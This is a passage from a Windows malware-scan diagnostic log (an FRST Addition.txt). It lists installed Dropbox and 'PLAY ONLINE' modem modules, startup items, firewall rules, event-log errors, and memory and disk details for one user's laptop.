(x86)\Dropbox\Client\PyQt5.QtPrintSupport.pyd 2017-04-15 21:58 - 2017-03-20 20:13 - 00060880 _____ () C:\Program Files (x86)\Dropbox\Client\win32print.pyd 2017-04-15 21:58 - 2017-04-14 01:34 - 00053072 _____ () C:\Program Files 
(x86)\Dropbox\Client\winrpcserver.compiled._RPCServer.pyd 2017-04-15 21:58 - 2017-04-14 01:34 - 00022864 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.user32.compiled._winffi_user32.pyd 2017-04-15 21:58 - 2017-04-14 01:34 - 00022872 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.iphlpapi.compiled._winffi_iphlpapi.pyd 2017-04-15 21:58 - 2017-04-14 01:34 - 00021848 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winerror.compiled._winffi_winerror.pyd 2017-04-15 21:58 - 2017-04-14 01:34 - 00022872 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.wininet.compiled._winffi_wininet.pyd 2017-04-15 21:58 - 2017-03-20 20:13 - 00349128 _____ () C:\Program Files (x86)\Dropbox\Client\winxpgui.pyd 2017-04-15 21:58 - 2017-04-14 01:34 - 00023896 _____ () C:\Program Files (x86)\Dropbox\Client\winverifysignature.compiled._VerifySignature.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 00025936 _____ () C:\Program Files (x86)\Dropbox\Client\librsyncffi.compiled._librsyncffi.pyd 2017-04-15 21:58 - 2017-03-20 20:08 - 00036296 _____ () C:\Program Files (x86)\Dropbox\Client\librsync.dll 2017-04-15 21:58 - 2017-04-14 01:33 - 00084288 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox_sqlite_ext.DLL 2017-04-15 21:58 - 2017-04-14 01:34 - 00030536 _____ () C:\Program Files (x86)\Dropbox\Client\wind3d11.compiled._wind3d11.pyd 2017-04-15 21:58 - 2017-03-20 20:17 - 00017864 _____ () C:\Program Files (x86)\Dropbox\Client\libEGL.dll 2017-04-15 21:58 - 2017-03-20 20:17 - 01631184 _____ () C:\Program Files (x86)\Dropbox\Client\libGLESv2.dll 2017-04-15 21:58 - 2017-04-14 01:33 - 00357688 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQml.pyd 2017-04-15 21:58 - 2017-04-14 01:34 - 00026456 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winhttp.compiled._winffi_winhttp.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 00546104 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQuick.pyd 2016-08-22 18:11 - 2016-08-22 18:11 - 00428032 _____ () C:\Program Files 
(x86)\PLAY ONLINE\core.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00261632 _____ () C:\Program Files (x86)\PLAY ONLINE\sdk.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00011362 _____ () C:\Program Files (x86)\PLAY ONLINE\mingwm10.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00043008 _____ () C:\Program Files (x86)\PLAY ONLINE\libgcc_s_dw2-1.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 02415104 _____ () C:\Program Files (x86)\PLAY ONLINE\QtCore4.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 09515520 _____ () C:\Program Files (x86)\PLAY ONLINE\QtGui4.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00381952 _____ () C:\Program Files (x86)\PLAY ONLINE\Proxy.DLL 2016-08-22 18:11 - 2016-08-22 18:11 - 00218112 _____ () C:\Program Files (x86)\PLAY ONLINE\Common.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00135168 _____ () C:\Program Files (x86)\PLAY ONLINE\Trace.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00545280 _____ () C:\Program Files (x86)\PLAY ONLINE\PluginContainer.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00238080 _____ () C:\Program Files (x86)\PLAY ONLINE\AtCodec.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00301056 _____ () C:\Program Files (x86)\PLAY ONLINE\DeviceSrvPlugin.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00235008 _____ () C:\Program Files (x86)\PLAY ONLINE\NetSrvPlugin.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00133120 _____ () C:\Program Files (x86)\PLAY ONLINE\OSDialup.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00159232 _____ () C:\Program Files (x86)\PLAY ONLINE\XCodec.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00157184 _____ () C:\Program Files (x86)\PLAY ONLINE\DataServicePlugin.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00176128 _____ () C:\Program Files (x86)\PLAY ONLINE\CallSrvPlugin.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00264704 _____ () C:\Program Files (x86)\PLAY ONLINE\AddrBookSrvPlugin.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00217600 _____ () C:\Program Files (x86)\PLAY ONLINE\SmsSrvPlugin.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00142336 _____ () C:\Program 
Files (x86)\PLAY ONLINE\USSDSrvPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00156672 _____ () C:\Program Files (x86)\PLAY ONLINE\STKSrvPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00338432 _____ () C:\Program Files (x86)\PLAY ONLINE\DeviceAppPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00065536 _____ () C:\Program Files (x86)\PLAY ONLINE\OSPowerMgr.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00106496 _____ () C:\Program Files (x86)\PLAY ONLINE\Win7Support.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 01077248 _____ () C:\Program Files (x86)\PLAY ONLINE\AddrBookPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00670720 _____ () C:\Program Files (x86)\PLAY ONLINE\SmsAppPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00550400 _____ () C:\Program Files (x86)\PLAY ONLINE\CallAppPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00547840 _____ () C:\Program Files (x86)\PLAY ONLINE\CallLogSrvPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00158720 _____ () C:\Program Files (x86)\PLAY ONLINE\NetConnectSrvPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00211968 _____ () C:\Program Files (x86)\PLAY ONLINE\DialUpPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00101376 _____ () C:\Program Files (x86)\PLAY ONLINE\OSAdapt.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00180224 _____ () C:\Program Files (x86)\PLAY ONLINE\NDISPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00131072 _____ () C:\Program Files (x86)\PLAY ONLINE\OSNDIS.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 01101824 _____ () C:\Program Files (x86)\PLAY ONLINE\NDISAPI.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00278528 _____ () C:\Program Files (x86)\PLAY ONLINE\NetInfoSrvPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00062976 _____ () C:\Program Files (x86)\PLAY ONLINE\OSCall.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00495104 _____ () C:\Program Files (x86)\PLAY ONLINE\DeviceMgrUIPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00123392 _____ () C:\Program Files (x86)\PLAY ONLINE\ATR2SMgr.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00190464 _____ () C:\Program Files (x86)\PLAY ONLINE\XFramePlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00310272 _____ () C:\Program Files (x86)\PLAY ONLINE\StatusBarMgrPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00118272 _____ () C:\Program Files (x86)\PLAY ONLINE\LayoutPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00427008 _____ () C:\Program Files (x86)\PLAY ONLINE\DialupUIPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00334848 _____ () C:\Program Files (x86)\PLAY ONLINE\MainpagePlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 01148416 _____ () C:\Program Files (x86)\PLAY ONLINE\QtNetwork4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00093184 _____ () C:\Program Files (x86)\PLAY ONLINE\NotifyServicePlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00333312 _____ () C:\Program Files (x86)\PLAY ONLINE\NetConnectPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00249344 _____ () C:\Program Files (x86)\PLAY ONLINE\MenuMgrPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00384512 _____ () C:\Program Files (x86)\PLAY ONLINE\USSDUIPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00483328 _____ () C:\Program Files (x86)\PLAY ONLINE\NetInfoUIExPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00808960 _____ () C:\Program Files (x86)\PLAY ONLINE\SMSUIPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00739328 _____ () C:\Program Files (x86)\PLAY ONLINE\AddrBookUIPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00269824 _____ () C:\Program Files (x86)\PLAY ONLINE\LiveUpdateInterface.DLL
2016-08-22 18:11 - 2016-08-22 18:11 - 00240128 _____ () C:\Program Files (x86)\PLAY ONLINE\ToolBarMgrPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00082944 _____ () C:\Program Files (x86)\PLAY ONLINE\plugins\imageformats\qgif4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00081920 _____ () C:\Program Files (x86)\PLAY ONLINE\plugins\imageformats\qico4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00192000 _____ () C:\Program Files (x86)\PLAY ONLINE\plugins\imageformats\qjpeg4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00350720 _____ () C:\Program Files (x86)\PLAY ONLINE\plugins\imageformats\qmng4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00370176 _____ () C:\Program Files (x86)\PLAY ONLINE\plugins\imageformats\qtiff4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00011362 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\mingwm10.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00043008 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\libgcc_s_dw2-1.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 02415104 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\QtCore4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 01148416 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\QtNetwork4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00384512 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\QueryStrategy.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00398336 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\QtXml4.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\Software\Classes\.scr: DWGTrueViewScriptFile => C:\Windows\system32\notepad.exe "%1"

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2016-08-26 09:34 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Tomash\AppData\Roaming\IrfanView\IrfanView_Wallpaper.bmp
DNS Servers: 194.204.152.34 - 194.204.159.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^SRS Premium Sound.lnk => C:\Windows\pss\SRS Premium Sound.lnk.CommonStartup
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeCS5ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: Dropbox => "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
MSCONFIG\startupreg: Samsung PanelMgr => C:\Windows\Samsung\PanelMgr\ssmmgr.exe /autorun
MSCONFIG\startupreg: Spotify => "C:\Users\Tomash\AppData\Roaming\Spotify\Spotify.exe" -autostart -minimized
MSCONFIG\startupreg: Spotify Web Helper => "C:\Users\Tomash\AppData\Roaming\Spotify\SpotifyWebHelper.exe"
MSCONFIG\startupreg: SteamServerBrowser => C:\Gry\Counter-Strike 1.6 v43\SteamServerBrowser\SteamServerBrowser.exe
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: SwitchBoard => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{952DB246-B97D-413F-BC12-879357E636A2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{BDBDCC65-EB1B-40A4-A733-7A911170804A}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{865093ED-8826-47CB-BCF3-769EFDBEBC17}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{8364D3FE-F517-4590-8737-2A3EEBFEE386}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [TCP Query User{573F4283-936B-4191-8DBE-0CD1079C701D}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe
FirewallRules: [UDP Query User{B2BC0F29-CA68-4326-9E69-925516454048}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe
FirewallRules: [TCP Query User{D3F405E1-691E-4FB1-B9E4-6FCE5C51B56C}C:\users\tomash\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\tomash\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{2B22E0B2-AEBF-41AD-AD2C-66FE4F6FE883}C:\users\tomash\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\tomash\appdata\roaming\spotify\spotify.exe
FirewallRules: [{DB22C5B3-2500-41F8-9C23-EE97473B4427}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe
FirewallRules: [{7AFAB6DA-28CD-4075-8DC7-3B6118A41CED}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe
FirewallRules: [{87AE4541-3404-4DAA-AC08-4BE5352A8BB5}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe
FirewallRules: [{7028F1C1-7A88-41C8-BBC3-CE3648684E36}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe
FirewallRules: [{61AE48B0-E9A8-4988-B234-CEDCD1F7634D}] => (Allow) C:\Program Files\Canon\DIAS\CnxDIAS.exe
FirewallRules: [TCP Query User{CF52DE92-1267-4C84-815E-E42984D2B684}C:\program files (x86)\java\jre1.8.0_101\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_101\bin\javaw.exe
FirewallRules: [UDP Query User{4114F933-16CD-445E-81B1-77642D7B2E2F}C:\program files (x86)\java\jre1.8.0_101\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_101\bin\javaw.exe
FirewallRules: [{BD9FFC32-B1C0-4C67-A306-9B29ABC9EDCB}] => (Allow) C:\Program Files (x86)\NapiProjekt\napisy.exe
FirewallRules: [{306F648F-943A-4217-89E8-D8C9835C8EB2}] => (Allow) C:\Program Files (x86)\NapiProjekt\napisy.exe
FirewallRules: [TCP Query User{316EB19A-68FC-4A7C-B30F-4C1398974C64}C:\gry\counter-strike 1.6 v43\hl.exe] => (Block) C:\gry\counter-strike 1.6 v43\hl.exe
FirewallRules: [UDP Query User{AABF5248-E548-4B36-B448-62BE90B2CF95}C:\gry\counter-strike 1.6 v43\hl.exe] => (Block) C:\gry\counter-strike 1.6 v43\hl.exe
FirewallRules: [{F333B0AB-54DF-4C33-9AFB-446CB8BE7D15}] => (Allow) C:\Users\Tomash\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{CBC628C3-8A42-45A8-8C3A-3D274C51506B}] => (Allow) C:\Users\Tomash\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{5703A76A-658C-455E-9547-267E52D65D8F}] => (Allow) C:\Program Files (x86)\MyPublicWiFi\MyPublicWiFi.exe
FirewallRules: [{B48F2B2C-0519-4BAA-86F2-C4F06EC4D01C}] => (Allow) C:\Program Files (x86)\MyPublicWiFi\MyPublicWiFi.exe
FirewallRules: [TCP Query User{6CDBFD09-2B3B-4E19-88E7-73F73CDB332D}C:\program files (x86)\brackets\node.exe] => (Allow) C:\program files (x86)\brackets\node.exe
FirewallRules: [UDP Query User{FC3BC232-9A09-475C-A637-349B94926CD5}C:\program files (x86)\brackets\node.exe] => (Allow) C:\program files (x86)\brackets\node.exe
FirewallRules: [TCP Query User{F595C148-3B37-4846-BC4C-EA034E361DAE}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{50451050-73EA-4C40-BD2E-8A71DCD99D19}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [TCP Query User{E7C5CEF3-2367-4E23-A0D3-7703B78D5A41}C:\program files (x86)\brackets\node.exe] => (Allow) C:\program files (x86)\brackets\node.exe
FirewallRules: [UDP Query User{EEAE9929-F5FB-4554-91BA-5DAA00C1F254}C:\program files (x86)\brackets\node.exe] => (Allow) C:\program files (x86)\brackets\node.exe
FirewallRules: [{44FF3773-F775-4A2B-8CB6-4AD28527CD83}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{9E8F7C1E-3B70-4331-9CC6-192653559BCC}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.596\SZBrowser.exe
FirewallRules: [{E5386C8D-592D-4E4A-AD91-64007AE4AC51}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe

==================== Restore Points =========================

12-04-2017 08:39:39 Scheduled Checkpoint
18-04-2017 15:28:22 Installed HexEdit

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (04/19/2017 08:10:34 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/18/2017 10:22:23 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/18/2017 04:41:08 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HexEdit.exe, version: 4.0.0.60, time stamp: 0x4ff7cad3
Faulting module name: ntdll.dll, version: 6.1.7601.17514, time stamp: 0x4ce7ba58
Exception code: 0xc015000f
Fault offset: 0x000845c1
Faulting process id: 0x4a4
Faulting application start time: 0x01d2b851ce63bb70
Faulting application path: C:\Program Files (x86)\HexEdit\HexEdit.exe
Faulting module path: C:\Windows\SysWOW64\ntdll.dll
Report Id: 0ed1e6f0-2445-11e7-862c-20cf30372acf

Error: (04/18/2017 04:21:31 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/18/2017 08:01:25 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/17/2017 08:54:58 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/16/2017 03:47:42 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/16/2017 01:44:49 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/15/2017 09:53:28 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/14/2017 08:10:41 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

System errors:
=============
Error: (04/19/2017 08:40:43 AM) (Source: ipnathlp) (EventID: 31004) (User: )
Description: The DNS proxy agent was unable to allocate 0 bytes of memory. This may indicate that the system is low on virtual memory, or that the memory manager has encountered an internal error.

Error: (04/19/2017 08:40:20 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The PLAY ONLINE. OUC service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.

Error: (04/19/2017 08:40:20 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the PLAY ONLINE. OUC service to connect.

Error: (04/19/2017 08:11:24 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HWDeviceService64.exe service terminated unexpectedly. It has done this 1 time(s).

Error: (04/19/2017 08:11:08 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} and APPID {344ED43D-D086-4961-86A6-1106F4ACAD9B} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.

Error: (04/19/2017 08:10:25 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: VBoxNetAdp

Error: (04/18/2017 10:38:18 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The PLAY ONLINE. OUC service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.

Error: (04/18/2017 10:38:18 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the PLAY ONLINE. OUC service to connect.

Error: (04/18/2017 10:23:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} and APPID {344ED43D-D086-4961-86A6-1106F4ACAD9B} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.

Error: (04/18/2017 10:23:02 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HWDeviceService64.exe service terminated unexpectedly. It has done this 1 time(s).

==================== Memory info ===========================

Processor: Pentium(R) Dual-Core CPU T4500 @ 2.30GHz
Percentage of memory in use: 71%
Total physical RAM: 3071.27 MB
Available physical RAM: 864.02 MB
Total Virtual: 6140.74 MB
Available Virtual: 2952.51 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:94.06 GB) (Free:18.71 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (Data) (Fixed) (Total:204.03 GB) (Free:32.21 GB) NTFS
Drive g: (PLAY ONLINE) (CDROM) (Total:0.03 GB) (Free:0 GB) CDFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: E0C5913D)
Partition 1: (Active) - (Size=94.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=204 GB) - (Type=OF Extended)

==================== End of Addition.txt ============================